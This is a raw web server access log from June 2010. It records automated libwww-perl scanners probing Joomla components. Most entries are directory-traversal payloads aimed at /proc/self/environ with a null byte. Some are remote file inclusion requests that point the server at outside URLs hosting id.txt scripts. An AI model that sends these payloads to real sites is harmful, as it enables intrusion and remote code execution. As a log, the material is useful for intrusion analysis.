213.171.37.206 - - [29/Jun/2010:04:32:00 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
213.171.37.206 - - [29/Jun/2010:04:32:00 -0500] "GET /logs/access_log.1277164800/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
79.175.165.14 - - [29/Jun/2010:04:32:00 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.175.165.14 - - [29/Jun/2010:04:32:29 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
213.171.37.206 - - [29/Jun/2010:04:32:55 -0500] "GET /logs/access_log.1275264000/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
79.175.165.14 - - [29/Jun/2010:04:32:55 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.175.165.14 - - [29/Jun/2010:04:33:01 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.175.165.14 - - [29/Jun/2010:04:33:21 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.175.165.14 - - [29/Jun/2010:04:33:46 -0500] "GET //?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
216.120.237.104 - - [29/Jun/2010:04:33:46 -0500] "GET /logs/access_log.1274572800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:33:46 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:33:46 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.831"
79.175.165.14 - - [29/Jun/2010:04:33:49 -0500] "GET //?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
79.175.165.14 - - [29/Jun/2010:04:33:50 -0500] "GET //?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
79.175.165.14 - - [29/Jun/2010:04:34:05 -0500] "GET //?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
79.175.165.14 - - [29/Jun/2010:04:35:15 -0500] "GET //?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
216.120.237.104 - - [29/Jun/2010:04:35:19 -0500] "GET /logs/access_log.1276732800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:35:19 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:35:19 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
186.28.232.13 - - [29/Jun/2010:04:35:38 -0500] "GET /logs/access_log.1275264000//?option=com_typedcontent&Itemid=25&mosConfig_absolute_path=http://www.systemediffusion.com/v2/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
216.120.237.104 - - [29/Jun/2010:04:36:00 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
79.175.165.14 - - [29/Jun/2010:04:36:13 -0500] "GET //?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
216.120.237.104 - - [29/Jun/2010:04:36:23 -0500] "GET /logs/access_log.1274054400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:36:23 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:36:23 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
79.175.165.14 - - [29/Jun/2010:04:36:28 -0500] "GET //?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
216.120.237.104 - - [29/Jun/2010:04:36:39 -0500] "GET /logs/access_log.1276732800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:36:39 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:36:39 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:37:02 -0500] "GET /logs/access_log.1277164800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:37:02 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:37:02 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:37:02 -0500] "GET /logs/access_log.1274572800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
79.175.165.14 - - [29/Jun/2010:04:37:06 -0500] "GET //?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
216.120.237.104 - - [29/Jun/2010:04:37:08 -0500] "GET /logs/access_log.1274054400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:37:08 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:37:08 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:37:46 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:37:46 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:37:47 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:38:07 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:38:07 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:38:07 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.195.112.180 - - [29/Jun/2010:04:38:18 -0500] "GET /logs/access_log.1271289600 HTTP/1.0" 200 669492 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.120.237.104 - - [29/Jun/2010:04:38:43 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:39:04 -0500] "GET /logs/access_log.1277164800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:39:04 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:39:04 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.831"
91.142.214.148 - - [29/Jun/2010:04:39:18 -0500] "GET /logs/access_log.1275264000//?option=com_typedcontent&Itemid=25&mosConfig_absolute_path=http://digenni.com/cms/cache/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
216.120.237.104 - - [29/Jun/2010:04:39:33 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:39:33 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:39:33 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:39:46 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:40:07 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:40:07 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:40:07 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:40:17 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.195.112.180 - - [29/Jun/2010:04:40:23 -0500] "GET /logs/access_log.1198281600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.120.237.104 - - [29/Jun/2010:04:40:37 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:40:51 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:40:51 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:40:51 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
64.34.165.224 - - [29/Jun/2010:04:41:06 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:41:08 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.142.75.205 - - [29/Jun/2010:04:41:14 -0500] "GET /logs/access_log.1276473600/language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
174.142.75.205 - - [29/Jun/2010:04:41:14 -0500] "GET /logs/language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
174.142.75.205 - - [29/Jun/2010:04:41:14 -0500] "GET /language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
64.34.165.224 - - [29/Jun/2010:04:41:40 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:41:53 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
216.120.237.104 - - [29/Jun/2010:04:42:14 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:42:21 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:42:21 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:42:21 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:42:31 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:42:31 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:42:31 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:42:41 -0500] "GET /logs/access_log.1277164800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:42:41 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:42:41 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:17 -0500] "GET /logs/access_log.1275868800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:18 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:18 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:20 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
64.34.165.224 - - [29/Jun/2010:04:43:22 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
216.120.237.104 - - [29/Jun/2010:04:43:26 -0500] "GET /logs/access_log.1277164800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:26 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:26 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:29 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:32 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:38 -0500] "GET /logs/access_log.1276214400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:43 -0500] "GET /logs/access_log.1275868800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:51 -0500] "GET /logs/access_log.1276819200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:52 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:52 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:43:52 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:44:15 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:44:21 -0500] "GET /logs/access_log.1275868800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:44:21 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:44:21 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.831"
64.34.165.224 - - [29/Jun/2010:04:44:38 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
216.120.237.104 - - [29/Jun/2010:04:44:42 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:44:43 -0500] "GET /logs/access_log.1276214400//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
64.34.165.224 - - [29/Jun/2010:04:44:50 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
216.120.237.104 - - [29/Jun/2010:04:45:44 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:45:44 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:45:44 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.831"
195.93.149.1 - - [29/Jun/2010:04:46:15 -0500] "GET /logs/access_log.1276300800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.120.237.104 - - [29/Jun/2010:04:46:35 -0500] "GET /logs/access_log.1274572800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
64.34.165.224 - - [29/Jun/2010:04:49:04 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:49:15 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.121.75.82 - - [29/Jun/2010:04:49:25 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
204.122.16.64 - - [29/Jun/2010:04:49:33 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
64.34.165.224 - - [29/Jun/2010:04:49:49 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:49:52 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
